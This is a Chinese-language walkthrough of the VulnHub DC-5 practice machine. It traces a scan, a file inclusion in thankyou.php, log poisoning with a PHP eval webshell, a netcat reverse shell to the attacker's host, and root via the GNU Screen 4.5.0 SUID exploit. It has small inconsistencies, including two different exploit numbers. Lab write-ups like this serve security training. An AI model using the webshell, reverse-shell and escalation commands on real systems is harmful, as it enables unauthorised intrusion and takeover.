DC-5

DC-5下载:https://download.vulnhub.com/dc/DC-5.zip.torrent

攻击者kali:192.168.1.9

受害者DC-5:192.168.1.8

通过arp-scan -l扫描到了DC-5的IP地址

使用nmap扫描一下端口

nmap -sS -A 192.168.1.8 -p 1-65535

发现有一个80端口和111端口并且运行着rpcinfo服务,39098

发现有个留言窗口，但是使用xss没有反应

反而提交的时候底部的时间总会变

安装dirsearch来扫描一下

dirsearch是一个目录扫描工具，目的是扫描网站敏感的文件和目录

apt-get install dirsearch

dirsearch用法

-u 指定网站   -w指定字典  -r递归目录

 -random-agents  使用随机UA

dirsearch -u http://192.168.1.8

扫描出来发现只有footer.php这个没有出现过；原本以为thankyou.php也有点嫌疑，后面访问之后发现是留言板之后的页面

尝试访问footer.php

每刷新一次，时间都会变

留言版的日期也是会变，thankyou.php包含了footer.php页面

这是不是有可能存在文件包含漏洞

尝试一下看看

file=/etc/passwd

查看passwd的文件，但是没有可以登录的

使用burp抓包修改数据

将一句话木马写入

<?php @eval($_POST['demon']);?>

点击发送

然后再修改成日志文件

因为执行的内容会被日志记录下来，通过Wappalyzer查看到了是nginx1.6.2版本的

它的日志会记录在/var/log/nginx/error.log

var/log/nginx/access.log

fan

再点击发送

在响应这边能看到了木马

使用蚁剑连接

http://192.168.1.8/thankyou.php?file=/var/log/nginx/error.log

连接成功

在终端简历反弹交互shell

kali 监听

反弹shell

python -c 'import pty;pty.spawn("/bin/bash")'

尝试提权

查看有suid的文件夹

find / -perm -u=s -type f 2>/dev/null

看到有个screen-4.5.0的版本号

GNU Screen是一款由GNU计划开发的用于命令行终端切换的自由软件。用户可以通过该软件同时连接多个本地或远程的命令行会话，并在其间自由切换。
GNU Screen可以看作是窗口管理器的命令行界面版本。它提供了统一的管理多个会话的界面和相应的功能。
搜索漏洞

去kali漏洞库搜索一下

发现有两个漏洞

先查看第一个

将第一个复制到桌面

cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh

按照脚本提示，先将第一部分内容写到libhax.c中(一共有三个部分)

第一步在桌面创建一个文件夹存放三个部分的脚本

使用命令vim创建第一个libhax.c

然后编译这个脚本

gcc -fPIC -shared -ldl -o libhax.so libhax.c

使用vim命令创建第二个rootshell.c

再编译

gcc -o rootshell rootshell.c

最后一个部分dc5.sh

执行完后，你会发现文件夹里有五个文件

将后缀.C的文件删掉

然后将三个文件上传到tmp文件中

注意是根目录下的tmp

然后重命名，把路径去掉

回到kali反弹的shell

进入到tmp目录

chmod 777 .dc5.sh  给dc5.sh权限

拿到root用户，成功提权

在root目录下拿到flag

DC-5总结

dirsearch目录扫描工具的使用及安装

文件包含漏洞的发现尝试？file=/etc/passwd打开文件是否是文件包含漏洞

burp抓包修改数据将一句话木马发送到靶机，查看Nginx日志是否有一句话木马

nginx日志文件

/var/log/nginx/error.log     var/log/nginx/access.log

nc 192.168.1.9 4444 -e /bin/sh 反弹

kali监听 nc -lvpn 4444

python -c 'import pty;pty.spawn("/bin/sh")'     shell交互使用

查看suid的文件夹   find / -perm -u=s -type f 2>/dev/null

kali搜索screen-4.5.0漏洞

GNU Screen是一款由GNU计划开发的用于命令行终端切换的自由软件。用户可以通过该软件同时连接多个本地或远程的命令行会话，并在其间自由切换。

GNU Screen可以看作是窗口管理器的命令行界面版本。它提供了统一的管理多个会话的界面和相应的功能。

使用41145.sh脚本提权